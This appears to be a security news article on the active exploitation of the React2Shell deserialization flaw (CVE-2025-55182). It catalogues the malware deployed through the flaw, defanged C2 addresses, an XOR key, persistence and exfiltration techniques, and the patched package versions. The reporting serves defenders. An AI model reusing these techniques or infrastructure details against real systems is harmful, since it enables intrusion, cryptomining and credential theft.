Active exploitation of a critical vulnerability in React Server Components, tracked as CVE‑2025‑55182 (React2Shell), targeting companies across multiple industry sectors worldwide.
React2Shell affects the Flight protocol, which facilitates client-server communication for React Server Components.
The vulnerability stems from insecure deserialization servers accept client data without proper verification, enabling remote code execution under specific conditions.
The campaign, first identified in December 2025, demonstrates how quickly adversaries can weaponize newly disclosed flaws to deploy diverse malware payloads.
Affected packages include react-server-dom-webpack, react-server-dom-parcel, and react-server-dom-turbopack versions 19.0 through 19.2.0. Patches are available in versions 19.0.1, 19.1.2, and 19.2.1.
Attack Campaigns and Malware
BI.ZONE Threat Detection and Response identified multiple attack waves targeting Russian insurance, e-commerce, and IT sectors, while global campaigns hit organizations elsewhere.
Attackers deliver payloads through Base64-encoded commands executed within compromised containers, establishing persistence via systemd services, cron jobs, and modified startup scripts.
XMRig Cryptocurrency Miner: The most frequently deployed malware, installed through Bash scripts (apaches.sh, setup2.sh, sex.sh) that create persistence mechanisms and terminate competing processes consuming excessive CPU resources.
Kaiji Botnet: Deployed as architecture-specific ELF executables (linux_386, linux_amd64), this Golang-based botnet performs DDoS attacks via SYN, ACK, and UDP floods, executes arbitrary shell commands, and embeds XMRig.
setup2.sh (Source : Medium).It establishes persistence through systemd services, crontab tasks, init.d scripts, and masquerades as legitimate system libraries.
RustoBot: Written in Rust and targeting TOTOLINK devices, this botnet retrieves C2 addresses through domain resolution (ilefttotolinkalone.anondns[.]net, rustbot. anondns[.]net) and conducts configurable DDoS attacks via UDP, TCP, and raw IP floods.
Sliver Implant: An advanced persistent threat tool deployed via d5.sh script, establishing persistence with root privileges through immutable files in /usr/bin/sshd-agent or hidden directories for non-root users. The implant connects to keep.camdvr[.]org for command-and-control.
CrossC2 Framework: Attackers deploy Cobalt Strike beacon payloads (a_x86, a_x64) packed with UPX, using AES-128-CBC encryption with hardcoded keys. The framework enables post-exploitation activities via the C2 server at 154.89.152[.]240:443.
Tactical RMM: Remote monitoring and management tools downloaded from 156.67.221[.]96, allowing attackers to maintain persistent administrative access.
VShell Backdoor: Go-based backdoor delivered through staged loaders that decrypt payloads using XOR with key 0x99, executed via memfd_create to evade detection. Configuration includes server 107.173.89[.]153:60051 and vkey “qwe123qwe111”.
EtherRAT: A novel JavaScript-based remote access trojan that retrieves C2 addresses from Ethereum smart contracts (0x22f96d61cf118efabc7c5bf3384734fad2f6ead4) via RPC endpoints.
The malware executes arbitrary JS code, steals cryptocurrency wallets, SSH keys, cloud credentials, and modifies nginx/Apache configurations to redirect traffic to external domains.
Mitigations
Adversaries employ DNS tunneling to exfiltrate reconnaissance data, using oastify[.]com subdomains to capture command execution results.
Reconnaissance scripts gather system information, network configurations, and running processes, exfiltrating data to endpoints like 109.238.92[.]111:8000/upload.
Attackers also add SSH keys to authorized_keys files for persistent access and terminate security monitoring processes to evade detection.
Organizations must immediately update all affected react-server-dom-* packages to patched versions (19.0.1, 19.1.2, 19.2.1 or higher). Next.js projects should be upgraded to include these patched dependencies.
After updating, rebuild projects and verify lock files to ensure vulnerable versions are completely removed.
Security teams should audit systems for IOCs, particularly connections to known malicious IPs (176.117.107[.]154, 45.137.201[.]137, 103.135.101[.]15, 128.199.194[.]97, 216.158.232[.]43) and domains, and monitor for unauthorized systemd services or cron jobs.
The rapid weaponization of React2Shell within hours of disclosure underscores the critical importance of immediate patching and continuous monitoring for post-exploitation activity.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.